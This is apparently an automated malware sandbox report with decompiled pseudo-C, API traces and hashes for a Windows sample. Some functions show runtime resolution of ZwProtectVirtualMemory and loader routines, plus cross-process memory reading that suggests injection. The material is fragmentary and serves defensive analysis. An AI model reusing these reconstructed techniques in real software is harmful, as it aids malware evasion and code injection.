Instruction ID: 6d716f5d6e4b1e895fa7b9618fa206aa9ec14b102bb12d30c8e4a116d539e29e
Opcode Fuzzy Hash: d2ef33143c1287e03155dba053b2720c21a804814e0b140adeb12520a9994683
Instruction Fuzzy Hash: 10F0D633605321ABC7317B75BC066AB3E65AF087A1710413AF909A65E1CF39C8418A9C

Function 0040FA43, Relevance: 6.0, APIs: 4, Instructions: 47
thread

C-Code - Quality: 68%

			E0040FA43(void* __ebx) {
				void* __edi;
				void* __esi;
				void* _t10;
				long _t13;
				long _t21;
				long* _t22;

				_t21 = GetLastError();
				E0040F928();
				_push( *0x42c490);
				_t22 =  *(TlsGetValue( *0x42c494))();
				if(_t22 == 0) {
					_t22 = E004110D9(1, 0x214);
					if(_t22 != 0) {
						_push(_t22);
						_push( *0x42c490);
						_t10 =  *((intOrPtr*)(E0040F8BC( *0x43664c)))();
						_t25 = _t10;
						if(_t10 == 0) {
							_push(_t22);
							E00410D1A(__ebx, _t21, _t22, __eflags);
							_t22 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t22);
							E0040F98F(__ebx, _t21, _t22, _t25);
							_t13 = GetCurrentThreadId();
							_t22[1] = _t22[1] | 0xffffffff;
							 *_t22 = _t13;
						}
					}
				}
				SetLastError(_t21);
				return _t22;
			}

0x0040fa4b
0x0040fa4d
0x0040fa52
0x0040fa66
0x0040fa6a
0x0040fa78
0x0040fa7e
0x0040fa80
0x0040fa81
0x0040fa93
0x0040fa95
0x0040fa97
0x0040fab1
0x0040fab2
0x0040fab8
0x0040fab8
0x0040fa99
0x0040fa99
0x0040fa9b
0x0040fa9c
0x0040faa3
0x0040faa9
0x0040faad
0x0040faad
0x0040fa97
0x0040fa7e
0x0040fabb
0x0040fac5

APIs

GetLastError.KERNEL32(00007FFF,00000000,0040D19D,0040C5A4,00418BD0,00000010,00402D4A,00417248), ref: 0040FA45

Part of subcall function 0040F928: TlsGetValue.KERNEL32(0040FA52), ref: 0040F92E
Part of subcall function 0040F928: TlsSetValue.KERNEL32(00000000), ref: 0040F94B

TlsGetValue.KERNEL32 ref: 0040FA5E
SetLastError.KERNEL32(00000000), ref: 0040FABB

Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE

Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?), ref: 0040F913

GetCurrentThreadId.KERNEL32 ref: 0040FAA3

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

Part of subcall function 0040F98F: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00418CB8,0000000C,0040FAA1,00000000,00000000), ref: 0040F9A0
Part of subcall function 0040F98F: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040F9C9
Part of subcall function 0040F98F: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040F9D9
Part of subcall function 0040F98F: InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Value$AddressErrorLastProc$HandleModule$CurrentDecodeFreeHeapIncrementInterlockedPointerSleepThread
String ID:
API String ID: 425413561-0
Opcode ID: 1b8de33cadd475d300f6bb80ced010cc9dd54014d7b858da1519cee61fc2bd9c
Instruction ID: 6d716f5d6e4b1e895fa7b9618fa206aa9ec14b102bb12d30c8e4a116d539e29e
Opcode Fuzzy Hash: 1b8de33cadd475d300f6bb80ced010cc9dd54014d7b858da1519cee61fc2bd9c
Instruction Fuzzy Hash: 10F0D633605321ABC7317B75BC066AB3E65AF087A1710413AF909A65E1CF39C8418A9C

Function 0040139F, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43

C-Code - Quality: 81%

			E0040139F(signed int __edx, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v8;
				void* _v20;
				signed int _t5;
				signed int _t6;
				signed int _t7;
				signed int _t9;
				signed int _t12;
				signed int _t13;
				signed int _t14;
				void* _t15;

				_t14 = __edx;
				_t5 =  *0x40545c; // 0x0
				_t15 = 0;
				_t6 = _t5 |  *0x405460;
				if(_t6 == 0) {
					L3:
					_t15 = 0x7f;
					_push("LdrLoadDll");
					_push(_a8);
					"j0hPA@"();
					 *0x40545c = _t6;
					_t7 = _t6 | _t14;
					 *0x405460 = _t14;
					if(_t7 != 0) {
						_push("LdrGetProcedureAddress");
						_push(_v0);
						"j0hPA@"();
						 *0x405464 = _t7;
						_t9 = _t7 | _t14;
						 *0x405468 = _t14;
						if(_t9 != 0) {
							_push("ZwProtectVirtualMemory");
							_push(_v8);
							"j0hPA@"();
							 *0x40546c = _t9;
							 *0x405470 = _t14;
							if((_t9 | _t14) != 0) {
								_t15 = 0;
								goto L7;
							}
						}
					}
				} else {
					_t12 =  *0x405464; // 0x0
					_t6 = _t12 |  *0x405468;
					if(_t6 == 0) {
						goto L3;
					} else {
						_t13 =  *0x40546c; // 0x0
						_t6 = _t13 |  *0x405470;
						if(_t6 != 0) {
							L7:
							memcpy(_v20, 0x40545c, 0x18);
						} else {
							goto L3;
						}
					}
				}
				return _t15;
			}

0x0040139f
0x0040139f
0x004013a5
0x004013a7
0x004013ad
0x004013c9
0x004013cb
0x004013cc
0x004013d1
0x004013d5
0x004013da
0x004013df
0x004013e1
0x004013e7
0x004013e9
0x004013ee
0x004013f2
0x004013f7
0x004013fc
0x004013fe
0x00401404
0x00401406
0x0040140b
0x0040140f
0x00401414
0x0040141b
0x00401421
0x00401423
0x00000000
0x00401423
0x00401421
0x00401404
0x004013af
0x004013af
0x004013b4
0x004013ba
0x00000000
0x004013bc
0x004013bc
0x004013c1
0x004013c7
0x00401425
0x00401430
0x00000000
0x00000000
0x00000000
0x004013c7
0x004013ba
0x0040143b

APIs

Part of subcall function 004025AD: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,00404150,00000030,00402138,ZwGetContextThread,?,004021CE,?,00000318,00000008), ref: 004025E9
Part of subcall function 004025AD: VirtualFree.KERNEL32(?,00000000,00008000,00000010,?,?,00404150,00000030,00402138,ZwGetContextThread,?,004021CE,?,00000318,00000008), ref: 00402672

memcpy.NTDLL(?,0040545C,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,00401610,?,?,?,?,00000000), ref: 00401430

Strings

ZwProtectVirtualMemory, xrefs: 00401406
LdrLoadDll, xrefs: 004013CC
LdrGetProcedureAddress, xrefs: 004013E9

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Virtual$AllocFreememcpy
String ID: LdrGetProcedureAddress$LdrLoadDll$ZwProtectVirtualMemory
API String ID: 4010158826-2710412950
Opcode ID: d8561f7d003f83693803ecea9f943d1b4d5465cf4284b455f53a8aea5818bb9c
Instruction ID: 01bc93e60ed2784d55cc8534dfa48ba2fc30ad28bcf1aabaee45f6fb336d972a
Opcode Fuzzy Hash: d8561f7d003f83693803ecea9f943d1b4d5465cf4284b455f53a8aea5818bb9c
Instruction Fuzzy Hash: D7014C30651A11ABC710EF65EE46B8777E0F790706B59883BB044BA2F2D3789894CF6D

Function 002DE542, Relevance: 6.0, APIs: 4, Instructions: 38

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 002DE551
GetVersion.KERNEL32 ref: 002DE560
GetCurrentProcessId.KERNEL32 ref: 002DE577
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 002DE590

Memory Dump Source

Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 8f6ce72ff6f1d89e85702df2e4ee5ef1f61c458c50eb7c89673b9968cf0f0864
Instruction ID: 6862ce5e624dff8c900e18dd938d6dbd9134fb14e61a210a56584a337cc5134d
Opcode Fuzzy Hash: 8f6ce72ff6f1d89e85702df2e4ee5ef1f61c458c50eb7c89673b9968cf0f0864
Instruction Fuzzy Hash: 40F0AFB06546018EEF20AF28BF09BD53BA8E744BA6F410136E784FA1E0E37048918F0C

Function 002D47CD, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemory

APIs

RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D47D6
Sleep.KERNEL32(0000000A,?,?,00000000,pnls,?,00000000,pnls,?,?,?,002D1FE5,00000058,00000000), ref: 002D47E0
HeapFree.KERNEL32(00000000,00000000), ref: 002D4808

Part of subcall function 002D4593: StrTrimA.SHLWAPI(?,002DA28C), ref: 002D45CC
Part of subcall function 002D4593: StrTrimA.SHLWAPI(00000001,002DA28C), ref: 002D45E9

RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4824

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CriticalSectionTrim$EnterFreeHeapLeaveSleep
String ID:
API String ID: 4004549260-0
Opcode ID: 32e50c33b27dd6d2c97a46f80eed04447dc4c788ce84990034d077343beee6c0
Instruction ID: 47b249322d7b3e75046c4b3d75c30194b3ab4cd3b0c12b76561db0f98447823d
Opcode Fuzzy Hash: 32e50c33b27dd6d2c97a46f80eed04447dc4c788ce84990034d077343beee6c0
Instruction Fuzzy Hash: 5AF03471A22202DBD622AF28ED4CF1A77A4AB25782F154417F841C2260C334EC20CB26

Function 002D10D5, Relevance: 6.0, APIs: 4, Instructions: 29memory

APIs

SetEvent.KERNEL32(002DB220), ref: 002D10E0
SleepEx.KERNEL32(00000064,00000001), ref: 002D10EF
CloseHandle.KERNEL32(002DB220), ref: 002D1110
HeapDestroy.KERNEL32(002DB1F0), ref: 002D1120

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 050b561464dcf688cc1d0f482254fba5694065773ea6b2686163efbf6b47d1ff
Instruction ID: f4eb7bbf751c1738ef6aad1d3f1b0f87e3f7d97e50450169ca974a295bdfe12d
Opcode Fuzzy Hash: 050b561464dcf688cc1d0f482254fba5694065773ea6b2686163efbf6b47d1ff
Instruction Fuzzy Hash: C6F01C32E16312ABD7216F75BC5DF1A37A8AB08752B058116BD05D36A0DB24CC64CA50

Function 002D48EB, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemory

APIs

RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D48F4
Sleep.KERNEL32(0000000A,?,?,00000000,pnls,?,00000000,pnls,?,?,?,002D1FE5,00000058,00000000), ref: 002D48FE
HeapFree.KERNEL32(00000000), ref: 002D492C
RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4941

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 5bfbe0f925974db9c267e47adcc56d32a96673c5c1f7b1e7545164c022452987
Instruction ID: 1aa5b107ecfaa15f1a969400bd4e1e360ccc7297493f652d9a5217491cf22a5d
Opcode Fuzzy Hash: 5bfbe0f925974db9c267e47adcc56d32a96673c5c1f7b1e7545164c022452987
Instruction Fuzzy Hash: 33F034B5A12202DBDB09AF25FD6CF2A33A4BB15706F01400BF882D3360C334AC10CB21

Function 00401EFE, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
libraryloader

C-Code - Quality: 81%

			E00401EFE(intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v84;
				char _v92;
				void* __esi;
				_Unknown_base(*)()* _t80;
				intOrPtr* _t81;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t94;
				signed int* _t95;
				unsigned int _t102;
				intOrPtr _t104;
				signed int _t105;
				char* _t107;
				signed int _t109;
				signed int* _t111;
				char _t124;
				void* _t125;
				intOrPtr* _t127;
				intOrPtr _t128;
				unsigned int _t131;

				_v24 = _v24 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t109 = 0;
				_t80 = GetProcAddress( *0x4054c4, "ZwWow64QueryInformationProcess64");
				if(_t80 == 0) {
					L23:
					_t81 = _a16;
					if(_t81 != 0) {
						 *_t81 = _t109;
					}
					if(_t109 <= _a12 && _t109 != 0) {
						_v24 = 1;
					}
					return _v24;
				}
				_push( &_v8);
				_push(0x30);
				_push( &_v92);
				_push(0);
				_push(_a4);
				if( *_t80() < 0) {
					goto L23;
				}
				_t84 = E00401046(0x200);
				_v20 = _t84;
				if(_t84 == 0) {
					goto L23;
				}
				_t125 = E00401046(0x100);
				if(_t125 == 0) {
					L21:
					E0040105B(_v20);
					if(_t125 != 0) {
						E0040105B(_t125);
					}
					goto L23;
				}
				_t88 = E00401EAA( &_v92,  &_v84, _a4, _t125, 0x28);
				_v8 = _t88;
				if(_t88 == 0) {
					goto L21;
				}
				_t12 = _t125 + 0x28; // 0x28
				_t14 = _t125 + 0x18; // 0x18
				_t127 = _t14;
				_t90 = E00401EAA( &_v92, _t127, _a4, _t12, 0x40);
				_v8 = _t90;
				if(_t90 == 0) {
					goto L21;
				}
				_t114 =  *(_t127 + 4);
				_t124 =  *((intOrPtr*)(_t125 + 0x38));
				_t128 =  *((intOrPtr*)(_t125 + 0x3c));
				_t92 =  *_t127 + 0x10;
				asm("adc ecx, ebx");
				_t111 =  &(_a8[2]);
				_v44 = _t92;
				_v40 = _t114;
				_v36 = _t124;
				_v32 = _t128;
				_v16 = 4;
				if(_t124 != _t92 || _t128 != _t114) {
					while(1) {
						_t25 = _t125 + 0x68; // 0x68
						_t94 = E00401EAA(_t114,  &_v36, _a4, _t25, 0x98);
						_v8 = _t94;
						if(_t94 == 0) {
							goto L18;
						}
						_v16 = _v16 + 0x120;
						_v36 =  *((intOrPtr*)(_t125 + 0x68));
						_v32 =  *((intOrPtr*)(_t125 + 0x6c));
						if(_v16 > _a12) {
							L16:
							if(_v36 != _v44 || _v32 != _v40) {
								continue;
							} else {
								goto L18;
							}
						}
						_t111[6] = _v12;
						_t111[5] =  *(_t125 + 0xd0);
						_t111[7] =  *((intOrPtr*)(_t125 + 0xd4));
						_t111[4] =  *(_t125 + 0xa8);
						_t102 = ( *(_t125 + 0xb0) & 0x0000ffff) >> 1;
						_t111[2] =  *(_t125 + 0x98);
						_t114 =  *(_t125 + 0x9c);
						_v28 = _t102;
						_t111[3] =  *(_t125 + 0x9c);
						if(_t102 >= 0x100) {
							L15:
							_t111 =  &(_t111[0x48]);
							_v12 = _v12 + 1;
							goto L16;
						}
						_t53 = _t125 + 0xb8; // 0xb8
						_t104 = E00401EAA(_t114, _t53, _a4, _v20,  *(_t125 + 0xb0) & 0x0000ffff);
						_v8 = _t104;
						if(_t104 == 0) {
							goto L15;
						}
						_t131 = _v28;
						_t105 = 0;
						if(_t131 <= 0) {
							L14:
							_t62 =  &(_t111[8]); // 0x18
							( &(_t111[8]))[_t131] = 0;
							_t107 = StrRChrA(_t62, 0, 0x5c);
							_t114 = 0xffe1 - _t111;
							_t111[7] =  &(_t107[0xffe1]);
							goto L15;
						} else {
							goto L13;
						}
						do {
							L13:
							 *((char*)(_t111 + _t105 + 0x20)) =  *((intOrPtr*)(_v20 + _t105 * 2));
							_t105 = _t105 + 1;
						} while (_t105 < _t131);
						goto L14;
					}
					goto L18;
				} else {
					L18:
					_t95 = _a8;
					if(_t95 != 0) {
						 *_t95 = _v12;
					}
					_t109 = _v16;
					goto L21;
				}
			}

0x00401f04
0x00401f08
0x00401f1a
0x00401f1c
0x00401f24
0x004020f7
0x004020f7
0x004020fc
0x004020fe
0x004020fe
0x00402103
0x00402109
0x00402109
0x00402117
0x00402117
0x00401f2d
0x00401f2e
0x00401f33
0x00401f34
0x00401f35
0x00401f3c
0x00000000
0x00000000
0x00401f47
0x00401f4e
0x00401f51
0x00000000
0x00000000
0x00401f61
0x00401f65
0x004020e5
0x004020e8
0x004020ef
0x004020f2
0x004020f2
0x00000000
0x004020ef
0x00401f74
0x00401f7b
0x00401f7e
0x00000000
0x00000000
0x00401f86
0x00401f8d
0x00401f8d
0x00401f90
0x00401f97
0x00401f9a
0x00000000
0x00000000
0x00401fa2
0x00401fa5
0x00401fa8
0x00401fab
0x00401fae
0x00401fb3
0x00401fb8
0x00401fbb
0x00401fbe
0x00401fc1
0x00401fc4
0x00401fcb
0x00401fd5
0x00401fda
0x00401fe4
0x00401feb
0x00401fee
0x00000000
0x00000000
0x00401ff7
0x00401ffe
0x00402004
0x0040200d
0x004020be
0x004020c4
0x00000000
0x00000000
0x00000000
0x00000000
0x004020c4
0x0040201e
0x00402028
0x00402032
0x0040203c
0x00402045
0x0040204c
0x0040204f
0x00402055
0x00402058
0x0040205b
0x004020b5
0x004020b5
0x004020bb
0x00000000
0x004020bb
0x00402068
0x00402071
0x00402078
0x0040207b
0x00000000
0x00000000
0x0040207d
0x00402080
0x00402084
0x00402095
0x00402099
0x0040209d
0x004020a2
0x004020ad
0x004020b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00402086
0x00402086
0x0040208c
0x00402090
0x00402091
0x00000000
0x00402086
0x00000000
0x004020d6
0x004020d6
0x004020d6
0x004020db
0x004020e0
0x004020e0
0x004020e2
0x00000000
0x004020e2

APIs

GetProcAddress.KERNEL32(ZwWow64QueryInformationProcess64,00000318,00000000,00000000), ref: 00401F1C

Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052

StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 004020A2

Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067

Part of subcall function 00401EAA: GetProcAddress.KERNEL32(ZwWow64ReadVirtualMemory64,00000000,?,?,?,00401F79,00000000,00000000,00000028,00000100,00000200), ref: 00401ECC

Strings

ZwWow64QueryInformationProcess64, xrefs: 00401F0F

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressHeapProc$AllocFree
String ID: ZwWow64QueryInformationProcess64
API String ID: 2873967426-1903490642
Opcode ID: 67615d1963f1d41362980ac05152757dfc87d522ce6721b7bf3f487be6093715
Instruction ID: 51d96d38a5a6676f4158eccec2c9cc356807936661d141839184c99d138b163b
Opcode Fuzzy Hash: 67615d1963f1d41362980ac05152757dfc87d522ce6721b7bf3f487be6093715
Instruction Fuzzy Hash: 35612E70A0030AABDB54DF55C984BAEBBB4FF08304F10446AEA54B73D1D778E950CBA5

Function 0040CD5B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75

C-Code - Quality: 90%

			E0040CD5B(CHAR* __edx) {
				int _v8;
				char* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t10;
				signed int _t11;
				char* _t12;
				void* _t19;
				CHAR* _t27;
				short** _t29;

				_t27 = __edx;
				_push(_t20);
				_t29 =  *0x4360a4; // 0x0
				_v8 = 0;
				_t10 =  *_t29;
				if(_t10 == 0) {
					L9:
					_t11 = 0;
					L10:
					return _t11;
				}
				_t19 = WideCharToMultiByte;
				while(1) {
					_t12 = WideCharToMultiByte(0, 0, _t10, 0xffffffff, 0, 0, 0, 0);
					_v12 = _t12;
					if(_t12 == 0) {
						break;
					}
					_t12 = E004110D9(_t12, 1);
					_v8 = _t12;
					if(_t12 == 0) {
						break;
					}
					_t4 =  &_v12; // 0x402d4a
					if(WideCharToMultiByte(0, 0,  *_t29, 0xffffffff, _t12,  *_t4, 0, 0) == 0) {
						_push(_v8);
						_t12 = E00410D1A(_t19, _t29, 0, __eflags);
						break;
					}
					if(E00410E52(_t27,  &_v8, 0) < 0) {
						_t39 = _v8;
						if(_v8 != 0) {
							_push(_v8);
							E00410D1A(_t19, _t29, 0, _t39);
							_v8 = 0;
						}
					}
					_t29 =  &(_t29[1]);
					_t10 =  *_t29;
					if(_t10 != 0) {
						continue;
					} else {
						goto L9;
					}
				}
				_t11 = _t12 | 0xffffffff;
				goto L10;
			}

0x0040cd5b
0x0040cd5f
0x0040cd65
0x0040cd6b
0x0040cd6e
0x0040cd72
0x0040cdd9
0x0040cdd9
0x0040cddb
0x0040cddf
0x0040cddf
0x0040cd74
0x0040cd7a
0x0040cd83
0x0040cd87
0x0040cd8a
0x00000000
0x00000000
0x0040cd8f
0x0040cd98
0x0040cd9b
0x00000000
0x00000000
0x0040cd9f
0x0040cdad
0x0040cde5
0x0040cde8
0x00000000
0x0040cded
0x0040cdbd
0x0040cdbf
0x0040cdc2
0x0040cdc4
0x0040cdc7
0x0040cdcd
0x0040cdcd
0x0040cdc2
0x0040cdd0
0x0040cdd3
0x0040cdd7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040cdd7
0x0040cde0
0x00000000

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00007FFF,01D31728,?,00000007,00000007,?,0040C52B,00007FFF), ref: 0040CD83
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,J-@HrA,00000000,00000000,?,00000007,00000007,?,0040C52B,00007FFF,?,00000000), ref: 0040CDA9

Part of subcall function 00410E52: _strlen.LIBCMT ref: 00410FFC
Part of subcall function 00410E52: _strlen.LIBCMT ref: 00411014
Part of subcall function 00410E52: SetEnvironmentVariableA.KERNEL32(00000000,00402D4A,?,?,?,?,00000000,75F2170D,?,00418BD0,00000010,00402D4A,00417248), ref: 0041104E

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE

Strings

J-@HrA, xrefs: 0040CD9F

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$EnvironmentErrorFreeHeapLastSleepVariable
String ID: J-@HrA
API String ID: 2645788438-3743386923
Opcode ID: d05a747ac7e643321df18475da575f52cde5650be1e572d6000e7e74171ff0e8
Instruction ID: 862c2698da29ef155e7c377974f9c720012f7384bd46a8a65f25befde52213b1
Opcode Fuzzy Hash: d05a747ac7e643321df18475da575f52cde5650be1e572d6000e7e74171ff0e8
Instruction Fuzzy Hash: 21118271906125FADB209BA69C85DDF7FADDE057B4B30063BF014E21D0EA74AD40D6A8

Function 0040219B, Relevance: 5.1, APIs: 4, Instructions: 109

C-Code - Quality: 41%

			E0040219B(void* __ecx, intOrPtr __edx, intOrPtr* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v984;
				intOrPtr _v988;
				signed int _v1112;
				intOrPtr _v1116;
				intOrPtr _v1188;
				void _v1228;
				int _v1232;
				char _v1236;
				char _v1240;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _t41;
				char* _t42;
				long _t50;
				intOrPtr _t51;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;

				_t68 = __esi;
				_t64 = __edx;
				_t61 = __ecx;
				_t59 = _a4;
				_v1236 = 0;
				_v1232 = 0;
				memset( &_v1228, 0, 0x4c8);
				_t66 = E0040211A(_t64);
				_t5 = _t68 + 0x218; // 0x218
				_v1188 = 0x100003;
				memcpy(_t5, E00402E4D, 0x100);
				_t41 = E004027AD(_t61,  *_t59);
				_v1260 = _t41;
				if(_t41 != 0) {
					_t42 =  &_v1236;
					asm("cdq");
					_push(_t64);
					_push(_t42);
					_v1252 = _t42;
					_v1248 = _t64;
					asm("cdq");
					_push(_t64);
					_push( *((intOrPtr*)(_t59 + 4)));
					_push(0);
					_push(2);
					_push( *((intOrPtr*)(_t66 + 4)));
					_push( *_t66);
					if(E00402DE0() >= 0) {
						_t14 = _t68 + 0x18; // 0x18
						asm("cdq");
						if( *((intOrPtr*)(__esi + 0x10)) == _t14 &&  *((intOrPtr*)(__esi + 0x14)) == _t64) {
							asm("adc ecx, ecx");
							 *((intOrPtr*)(__esi + 0x10)) = _v1256 + 0x18;
							 *((intOrPtr*)(__esi + 0x14)) = 0;
						}
						 *_t68 = _v988;
						 *((intOrPtr*)(_t68 + 4)) = _v984;
						if(E0040276A( *_t59, _v1256, _t68,  &_v1240) == 0) {
							goto L11;
						} else {
							_t51 = _v1256;
							_push(_v1248);
							_v1112 = _v1112 & 0x00000000;
							_push(_v1252);
							_v1116 = _t51;
							asm("cdq");
							_v988 = _t51 + 0x218;
							_v984 = _t64;
							asm("cdq");
							_push(_t64);
							_push( *((intOrPtr*)(_t59 + 4)));
							_push(0);
							_push(2);
							_push( *((intOrPtr*)(_t66 + 0xc)));
							_push( *((intOrPtr*)(_t66 + 8)));
							if(E00402DE0() < 0) {
								goto L3;
							} else {
								_t50 = 0;
								goto L10;
							}
						}
					} else {
						L3:
						_t50 = 5;
					}
				} else {
					_t50 = GetLastError();
					L10:
					if(_t50 == 0xffffffff) {
						L11:
						_t50 = GetLastError();
					}
				}
				return _t50;
			}

0x0040219b
0x0040219b
0x0040219b
0x004021a8
0x004021b4
0x004021b8
0x004021c1
0x004021d3
0x004021d5
0x004021e1
0x004021e9
0x004021f3
0x004021fa
0x004021fe
0x0040220b
0x0040220f
0x00402210
0x00402211
0x00402212
0x00402219
0x0040221d
0x0040221e
0x0040221f
0x00402220
0x00402222
0x00402224
0x00402227
0x00402233
0x00402240
0x00402243
0x00402246
0x00402258
0x0040225a
0x0040225d
0x0040225d
0x00402267
0x00402270
0x00402286
0x00000000
0x00402288
0x00402288
0x0040228c
0x00402290
0x00402298
0x0040229c
0x004022a8
0x004022a9
0x004022b3
0x004022ba
0x004022bb
0x004022bc
0x004022bd
0x004022bf
0x004022c1
0x004022c4
0x004022d1
0x00000000
0x004022d7
0x004022d7
0x00000000
0x004022d7
0x004022d1
0x00402235
0x00402235
0x00402237
0x00402237
0x00402200
0x00402200
0x004022d9
0x004022dc
0x004022de
0x004022de
0x004022de
0x004022dc
0x004022e9

APIs

memset.NTDLL ref: 004021C1
memcpy.NTDLL ref: 004021E9

Part of subcall function 004027AD: RtlNtStatusToDosError.NTDLL ref: 004027E5
Part of subcall function 004027AD: SetLastError.KERNEL32(00000000,?,?,?,00402336), ref: 004027EC

GetLastError.KERNEL32(00000010,00000218,00402E4D,00000100,?,00000318,00000008), ref: 00402200

Part of subcall function 0040276A: RtlNtStatusToDosError.NTDLL ref: 0040279A
Part of subcall function 0040276A: SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004027A1

GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,00402E4D,00000100), ref: 004022DE

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

